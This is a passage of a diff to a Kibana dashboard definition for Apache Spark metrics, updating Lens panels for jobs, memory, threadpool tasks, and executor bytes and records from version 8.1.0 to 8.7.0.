"lnsMetric" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Number of Tasks over time [Metrics Apache Spark]" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 6, + "i": "64cbf207-795a-4818-915c-137eaebc6198", + "w": 8, + "x": 0, + "y": 17 + }, + "panelIndex": "64cbf207-795a-4818-915c-137eaebc6198", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-efa9fcdd-f421-4c27-a85b-3a6d2512a09d", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "b8679379-0bbe-4028-b3e7-2cc0f84fa045", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "97467acb-706a-4078-ae1a-ac6ab5fd47d7", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "efa9fcdd-f421-4c27-a85b-3a6d2512a09d": { + "columnOrder": [ + "6962059b-392d-416f-a321-b0de80b841a7" + ], + "columns": { + "6962059b-392d-416f-a321-b0de80b841a7": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Max Memory (MB)", + "operationType": "last_value", + "params": { + "sortField": "@timestamp", + "showArrayValues": true + }, + "scale": "ratio", + "sourceField": "apache_spark.driver.memory.max_mem" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "b8679379-0bbe-4028-b3e7-2cc0f84fa045", + "key": "event.dataset", + "negate": false, + "params": { + "query": "apache_spark.driver" }, - "enhancements": {}, - "hidePanelTitles": true - }, - "gridData": { - "h": 6, - "i": "62c6f93e-b6c1-4004-b780-535ed730ebaa", - "w": 8, - "x": 8, - "y": 17 + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "apache_spark.driver" + } + } }, - "panelIndex": "62c6f93e-b6c1-4004-b780-535ed730ebaa", - "title": "Number of jobs failed [Metrics Apache Spark]", - "type": "lens", - "version": "8.1.0" + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "97467acb-706a-4078-ae1a-ac6ab5fd47d7", + "key": "apache_spark.driver.memory.max_mem", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "apache_spark.driver.memory.max_mem" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "6962059b-392d-416f-a321-b0de80b841a7", + "layerId": "efa9fcdd-f421-4c27-a85b-3a6d2512a09d", + "layerType": "data", + "textAlign": "center", + "titlePosition": "bottom", + "size": "xl" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-aec1fa6a-6818-41f0-862a-8c7feed2ea3e", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "3fe0b162-ec79-4815-895a-79ac382ca1d7", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "62857a2d-669f-4c70-9f92-dcab405c9f9a", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "aec1fa6a-6818-41f0-862a-8c7feed2ea3e": { - "columnOrder": [ - "f69b66b5-f920-44c1-9b5a-0f6076ac9f6a" - ], - "columns": { - "f69b66b5-f920-44c1-9b5a-0f6076ac9f6a": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Succeeded Jobs", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "apache_spark.driver.jobs.succeeded" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "3fe0b162-ec79-4815-895a-79ac382ca1d7", - "key": "event.dataset", - "negate": false, - "params": { - "query": "apache_spark.driver" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "event.dataset": "apache_spark.driver" - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "62857a2d-669f-4c70-9f92-dcab405c9f9a", - "key": "apache_spark.driver.jobs.succeeded", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "apache_spark.driver.jobs.succeeded" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "accessor": "f69b66b5-f920-44c1-9b5a-0f6076ac9f6a", - "layerId": "aec1fa6a-6818-41f0-862a-8c7feed2ea3e", - "layerType": "data" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + }, + "title": "Maximum amount of memory available for storage [Metrics Apache Spark]" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 6, + "i": "62c6f93e-b6c1-4004-b780-535ed730ebaa", + "w": 8, + "x": 8, + "y": 17 + }, + "panelIndex": "62c6f93e-b6c1-4004-b780-535ed730ebaa", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-483b85ff-1b76-41d9-926b-25f70122ef28", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "509e9888-4307-45b6-9c04-5b7feafeef87", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "df5be9fa-fb96-4da2-a042-71b37b7c3275", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "483b85ff-1b76-41d9-926b-25f70122ef28": { + "columnOrder": [ + "6ecaa697-7840-4a3c-a949-687d66bd9cdd" + ], + "columns": { + "6ecaa697-7840-4a3c-a949-687d66bd9cdd": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Failed Jobs", + "operationType": "last_value", + "params": { + "sortField": "@timestamp", + "showArrayValues": true + }, + "scale": "ratio", + "sourceField": "apache_spark.driver.jobs.failed" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "509e9888-4307-45b6-9c04-5b7feafeef87", + "key": "event.dataset", + "negate": false, + "params": { + "query": "apache_spark.driver" }, - "enhancements": {}, - "hidePanelTitles": true + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "apache_spark.driver" + } + } }, - "gridData": { - "h": 6, - "i": "bb9eb57d-fbf2-41a4-8187-5cead0c80faa", - "w": 8, - "x": 16, - "y": 17 + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "df5be9fa-fb96-4da2-a042-71b37b7c3275", + "key": "apache_spark.driver.jobs.failed", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "apache_spark.driver.jobs.failed" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "6ecaa697-7840-4a3c-a949-687d66bd9cdd", + "layerId": "483b85ff-1b76-41d9-926b-25f70122ef28", + "layerType": "data", + "textAlign": "center", + "titlePosition": "bottom", + "size": "xl" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + }, + "title": "Number of jobs failed [Metrics Apache Spark]" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 6, + "i": "bb9eb57d-fbf2-41a4-8187-5cead0c80faa", + "w": 8, + "x": 16, + "y": 17 + }, + "panelIndex": "bb9eb57d-fbf2-41a4-8187-5cead0c80faa", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-aec1fa6a-6818-41f0-862a-8c7feed2ea3e", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "3fe0b162-ec79-4815-895a-79ac382ca1d7", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "62857a2d-669f-4c70-9f92-dcab405c9f9a", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "aec1fa6a-6818-41f0-862a-8c7feed2ea3e": { + "columnOrder": [ + "f69b66b5-f920-44c1-9b5a-0f6076ac9f6a" + ], + "columns": { + "f69b66b5-f920-44c1-9b5a-0f6076ac9f6a": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Succeeded Jobs", + "operationType": "last_value", + "params": { + "sortField": "@timestamp", + "showArrayValues": true + }, + "scale": "ratio", + "sourceField": "apache_spark.driver.jobs.succeeded" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "3fe0b162-ec79-4815-895a-79ac382ca1d7", + "key": "event.dataset", + "negate": false, + "params": { + "query": "apache_spark.driver" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "apache_spark.driver" + } + } }, - "panelIndex": "bb9eb57d-fbf2-41a4-8187-5cead0c80faa", - "title": "Number of Succeeded jobs [Metrics Apache Spark]", - "type": "lens", - "version": "8.1.0" + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "62857a2d-669f-4c70-9f92-dcab405c9f9a", + "key": "apache_spark.driver.jobs.succeeded", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "apache_spark.driver.jobs.succeeded" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "f69b66b5-f920-44c1-9b5a-0f6076ac9f6a", + "layerId": "aec1fa6a-6818-41f0-862a-8c7feed2ea3e", + "layerType": "data", + "textAlign": "center", + "titlePosition": "bottom", + "size": "xl" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-df39527d-9339-47cb-9833-2e3d3ccc9c30", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "1215080a-2795-41e4-a618-d54b0e020cbc", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "df39527d-9339-47cb-9833-2e3d3ccc9c30": { - "columnOrder": [ - "f4ed5f54-aae1-4dfe-82bf-e5d6181beef3", - "8c4d8d9d-46d4-4140-8aa7-5e8066fd577a", - "16d7f486-58c7-46a1-96ea-d2be88b82633", - "02d81198-17ac-4861-870d-c481ba9a7dad" - ], - "columns": { - "02d81198-17ac-4861-870d-c481ba9a7dad": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Started", - "operationType": "max", - "scale": "ratio", - "sourceField": "apache_spark.executor.threadpool.started_tasks" - }, - "16d7f486-58c7-46a1-96ea-d2be88b82633": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Active", - "operationType": "max", - "scale": "ratio", - "sourceField": "apache_spark.executor.threadpool.active_tasks" - }, - "8c4d8d9d-46d4-4140-8aa7-5e8066fd577a": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Completed", - "operationType": "max", - "scale": "ratio", - "sourceField": "apache_spark.executor.threadpool.complete_tasks" - }, - "f4ed5f54-aae1-4dfe-82bf-e5d6181beef3": { - "customLabel": true, - "dataType": "date", - "isBucketed": true, - "label": "Timestamp", - "operationType": "date_histogram", - "params": { - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "1215080a-2795-41e4-a618-d54b0e020cbc", - "key": "event.dataset", - "negate": false, - "params": { - "query": "apache_spark.executor" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "event.dataset": "apache_spark.executor" - } - } - } - ], - "query": { - "language": "kuery", - "query": "apache_spark.executor.threadpool.complete_tasks : * or apache_spark.executor.threadpool.active_tasks : * or apache_spark.executor.threadpool.started_tasks : * " - }, - "visualization": { - "fittingFunction": "Linear", - "gridlinesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "8c4d8d9d-46d4-4140-8aa7-5e8066fd577a", - "16d7f486-58c7-46a1-96ea-d2be88b82633", - "02d81198-17ac-4861-870d-c481ba9a7dad" - ], - "layerId": "df39527d-9339-47cb-9833-2e3d3ccc9c30", - "layerType": "data", - "position": "top", - "seriesType": "area", - "showGridlines": false, - "xAccessor": "f4ed5f54-aae1-4dfe-82bf-e5d6181beef3", - "yConfig": [ - { - "axisMode": "left", - "color": "#54b399", - "forAccessor": "8c4d8d9d-46d4-4140-8aa7-5e8066fd577a" - }, - { - "axisMode": "left", - "forAccessor": "16d7f486-58c7-46a1-96ea-d2be88b82633" - }, - { - "axisMode": "left", - "color": "#d6bf57", - "forAccessor": "02d81198-17ac-4861-870d-c481ba9a7dad" - } - ] - } - ], - "legend": { - "isVisible": true, - "position": "top", - "showSingleSeries": true - }, - "preferredSeriesType": "area", - "title": "Empty XY chart", - "valueLabels": "hide", - "xTitle": "Timestamp", - "yLeftExtent": { - "mode": "full" - }, - "yRightExtent": { - "mode": "full" - }, - "yTitle": "Threadpool Tasks" - } + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + }, + "title": "Number of Succeeded jobs [Metrics Apache Spark]" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 13, + "i": "b5caa5d1-221e-400d-a11a-ea539f1f4546", + "w": 26, + "x": 0, + "y": 23 + }, + "panelIndex": "b5caa5d1-221e-400d-a11a-ea539f1f4546", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-df39527d-9339-47cb-9833-2e3d3ccc9c30", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "1215080a-2795-41e4-a618-d54b0e020cbc", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "df39527d-9339-47cb-9833-2e3d3ccc9c30": { + "columnOrder": [ + "f4ed5f54-aae1-4dfe-82bf-e5d6181beef3", + "8c4d8d9d-46d4-4140-8aa7-5e8066fd577a", + "16d7f486-58c7-46a1-96ea-d2be88b82633", + "02d81198-17ac-4861-870d-c481ba9a7dad" + ], + "columns": { + "02d81198-17ac-4861-870d-c481ba9a7dad": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Started", + "operationType": "max", + "scale": "ratio", + "sourceField": "apache_spark.executor.threadpool.started_tasks" }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" + "16d7f486-58c7-46a1-96ea-d2be88b82633": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Active", + "operationType": "max", + "scale": "ratio", + "sourceField": "apache_spark.executor.threadpool.active_tasks" + }, + "8c4d8d9d-46d4-4140-8aa7-5e8066fd577a": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Completed", + "operationType": "max", + "scale": "ratio", + "sourceField": "apache_spark.executor.threadpool.complete_tasks" + }, + "f4ed5f54-aae1-4dfe-82bf-e5d6181beef3": { + "customLabel": true, + "dataType": "date", + "isBucketed": true, + "label": "Timestamp", + "operationType": "date_histogram", + "params": { + "interval": "auto", + "includeEmptyRows": true + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "1215080a-2795-41e4-a618-d54b0e020cbc", + "key": "event.dataset", + "negate": false, + "params": { + "query": "apache_spark.executor" }, - "enhancements": {}, - "hidePanelTitles": false + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "apache_spark.executor" + } + } + } + ], + "query": { + "language": "kuery", + "query": "apache_spark.executor.threadpool.complete_tasks : * or apache_spark.executor.threadpool.active_tasks : * or apache_spark.executor.threadpool.started_tasks : * " + }, + "visualization": { + "fittingFunction": "Linear", + "gridlinesVisibilitySettings": { + "x": false, + "yLeft": false, + "yRight": true }, - "gridData": { - "h": 13, - "i": "b5caa5d1-221e-400d-a11a-ea539f1f4546", - "w": 26, - "x": 0, - "y": 23 + "layers": [ + { + "accessors": [ + "8c4d8d9d-46d4-4140-8aa7-5e8066fd577a", + "16d7f486-58c7-46a1-96ea-d2be88b82633", + "02d81198-17ac-4861-870d-c481ba9a7dad" + ], + "layerId": "df39527d-9339-47cb-9833-2e3d3ccc9c30", + "layerType": "data", + "position": "top", + "seriesType": "area", + "showGridlines": false, + "xAccessor": "f4ed5f54-aae1-4dfe-82bf-e5d6181beef3", + "yConfig": [ + { + "axisMode": "left", + "color": "#54b399", + "forAccessor": "8c4d8d9d-46d4-4140-8aa7-5e8066fd577a" + }, + { + "axisMode": "left", + "forAccessor": "16d7f486-58c7-46a1-96ea-d2be88b82633" + }, + { + "axisMode": "left", + "color": "#d6bf57", + "forAccessor": "02d81198-17ac-4861-870d-c481ba9a7dad" + } + ] + } + ], + "legend": { + "isVisible": true, + "position": "top", + "showSingleSeries": true, + "legendSize": "auto" }, - "panelIndex": "b5caa5d1-221e-400d-a11a-ea539f1f4546", - "title": "Number of Threadpool tasks over time [Metrics Apache Spark]", - "type": "lens", - "version": "8.1.0" - }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": true + "preferredSeriesType": "area", + "title": "Empty XY chart", + "valueLabels": "hide", + "xTitle": "Timestamp", + "yLeftExtent": { + "mode": "full" }, - "gridData": { - "h": 5, - "i": "7a729bca-db45-4ffe-b1bf-51fdc30e3b18", - "w": 8, - "x": 26, - "y": 23 + "yRightExtent": { + "mode": "full" }, - "panelIndex": "7a729bca-db45-4ffe-b1bf-51fdc30e3b18", - "panelRefName": "panel_7a729bca-db45-4ffe-b1bf-51fdc30e3b18", - "type": "lens", - "version": "8.1.0" + "yTitle": "Threadpool Tasks" + } }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": true - }, - "gridData": { - "h": 5, - "i": "0595e44f-e6b0-4d93-868f-040f2eb0de31", - "w": 7, - "x": 34, - "y": 23 - }, - "panelIndex": "0595e44f-e6b0-4d93-868f-040f2eb0de31", - "panelRefName": "panel_0595e44f-e6b0-4d93-868f-040f2eb0de31", - "type": "lens", - "version": "8.1.0" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Number of Threadpool tasks over time [Metrics Apache Spark]" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 5, + "i": "7a729bca-db45-4ffe-b1bf-51fdc30e3b18", + "w": 8, + "x": 26, + "y": 23 + }, + "panelIndex": "7a729bca-db45-4ffe-b1bf-51fdc30e3b18", + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": true, + "attributes": { + "description": "", + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "3a277aff-7c7b-443b-bccf-271cb4486f72": { + "columnOrder": [ + "08a11063-090b-4210-a4e4-30189048b7aa" + ], + "columns": { + "08a11063-090b-4210-a4e4-30189048b7aa": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Bytes Read", + "operationType": "last_value", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } + }, + "sortField": "@timestamp", + "showArrayValues": true + }, + "scale": "ratio", + "sourceField": "apache_spark.executor.bytes.read" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "e2038555-6ef6-4a33-b50c-c175b2ebbe02", + "key": "apache_spark.executor.bytes.read", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "apache_spark.executor.bytes.read" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "08a11063-090b-4210-a4e4-30189048b7aa", + "layerId": "3a277aff-7c7b-443b-bccf-271cb4486f72", + "layerType": "data", + "textAlign": "center", + "titlePosition": "bottom", + "size": "xl" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-d4698267-4169-47b1-81cd-17bd8621879f", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "171181c8-0b9a-4664-85cb-0e8b82132b7a", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "6ffc819a-ab7a-43bd-aa18-dbd327428425", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "d4698267-4169-47b1-81cd-17bd8621879f": { - "columnOrder": [ - "f718a530-bd5f-4e8e-8960-ffac1ce48483" - ], - "columns": { - "f718a530-bd5f-4e8e-8960-ffac1ce48483": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Waiting Applications", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "apache_spark.node.main.applications.waiting" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "171181c8-0b9a-4664-85cb-0e8b82132b7a", - "key": "event.dataset", - "negate": false, - "params": { - "query": "apache_spark.node" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "event.dataset": "apache_spark.node" - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "6ffc819a-ab7a-43bd-aa18-dbd327428425", - "key": "apache_spark.node.main.applications.waiting", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "apache_spark.node.main.applications.waiting" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "accessor": "f718a530-bd5f-4e8e-8960-ffac1ce48483", - "layerId": "d4698267-4169-47b1-81cd-17bd8621879f", - "layerType": "data" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" + "title": "Number of Bytes Read [Metrics Apache Spark]", + "visualizationType": "lnsLegacyMetric", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-3a277aff-7c7b-443b-bccf-271cb4486f72", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "e2038555-6ef6-4a33-b50c-c175b2ebbe02", + "type": "index-pattern" + } + ] + }, + "type": "lens" + } + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 5, + "i": "0595e44f-e6b0-4d93-868f-040f2eb0de31", + "w": 7, + "x": 34, + "y": 23 + }, + "panelIndex": "0595e44f-e6b0-4d93-868f-040f2eb0de31", + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": true, + "attributes": { + "description": "", + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "5d66805e-b15a-4a65-b914-128afac75b09": { + "columnOrder": [ + "55aa8a79-a965-4ad3-bd75-1182fc29570e" + ], + "columns": { + "55aa8a79-a965-4ad3-bd75-1182fc29570e": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Bytes Written", + "operationType": "last_value", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 2 + } + }, + "sortField": "@timestamp", + "showArrayValues": true + }, + "scale": "ratio", + "sourceField": "apache_spark.executor.bytes.written" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "f4140b61-62cd-4abe-a34e-bb7a1d14fefb", + "key": "apache_spark.executor.bytes.written", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "apache_spark.executor.bytes.written" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "55aa8a79-a965-4ad3-bd75-1182fc29570e", + "layerId": "5d66805e-b15a-4a65-b914-128afac75b09", + "layerType": "data", + "textAlign": "center", + "titlePosition": "bottom", + "size": "xl" + } + }, + "title": "Number of Bytes Written [Metrics Apache Spark]", + "visualizationType": "lnsLegacyMetric", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-5d66805e-b15a-4a65-b914-128afac75b09", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "f4140b61-62cd-4abe-a34e-bb7a1d14fefb", + "type": "index-pattern" + } + ] + }, + "type": "lens" + } + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 5, + "i": "ab8c87f3-ec56-4ddc-b0b0-7bb8a21366c2", + "w": 7, + "x": 41, + "y": 23 + }, + "panelIndex": "ab8c87f3-ec56-4ddc-b0b0-7bb8a21366c2", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-d4698267-4169-47b1-81cd-17bd8621879f", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "171181c8-0b9a-4664-85cb-0e8b82132b7a", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "6ffc819a-ab7a-43bd-aa18-dbd327428425", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "d4698267-4169-47b1-81cd-17bd8621879f": { + "columnOrder": [ + "f718a530-bd5f-4e8e-8960-ffac1ce48483" + ], + "columns": { + "f718a530-bd5f-4e8e-8960-ffac1ce48483": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Waiting Applications", + "operationType": "last_value", + "params": { + "sortField": "@timestamp", + "showArrayValues": true + }, + "scale": "ratio", + "sourceField": "apache_spark.node.main.applications.waiting" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "171181c8-0b9a-4664-85cb-0e8b82132b7a", + "key": "event.dataset", + "negate": false, + "params": { + "query": "apache_spark.node" }, - "enhancements": {}, - "hidePanelTitles": true - }, - "gridData": { - "h": 5, - "i": "ab8c87f3-ec56-4ddc-b0b0-7bb8a21366c2", - "w": 7, - "x": 41, - "y": 23 + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "apache_spark.node" + } + } }, - "panelIndex": "ab8c87f3-ec56-4ddc-b0b0-7bb8a21366c2", - "title": "Number of Applications waiting [Metrics Apache Spark]", - "type": "lens", - "version": "8.1.0" + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "6ffc819a-ab7a-43bd-aa18-dbd327428425", + "key": "apache_spark.node.main.applications.waiting", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "apache_spark.node.main.applications.waiting" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "f718a530-bd5f-4e8e-8960-ffac1ce48483", + "layerId": "d4698267-4169-47b1-81cd-17bd8621879f", + "layerType": "data", + "textAlign": "center", + "titlePosition": "bottom", + "size": "xl" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-aa4bc89a-1467-4370-980f-99b6e33890d7", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "975bff6a-acfa-481f-86ba-7d697e207f65", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "b889078f-52b4-4fdd-8fd5-6a636ff903a6", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "aa4bc89a-1467-4370-980f-99b6e33890d7": { - "columnOrder": [ - "f983c8f0-92bc-4d73-b8d4-f8d7c7851fb0" - ], - "columns": { - "f983c8f0-92bc-4d73-b8d4-f8d7c7851fb0": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Records Read", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "apache_spark.executor.records.read" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "975bff6a-acfa-481f-86ba-7d697e207f65", - "key": "event.dataset", - "negate": false, - "params": { - "query": "apache_spark.executor" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "event.dataset": "apache_spark.executor" - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "b889078f-52b4-4fdd-8fd5-6a636ff903a6", - "key": "apache_spark.executor.records.read", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "apache_spark.executor.records.read" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "accessor": 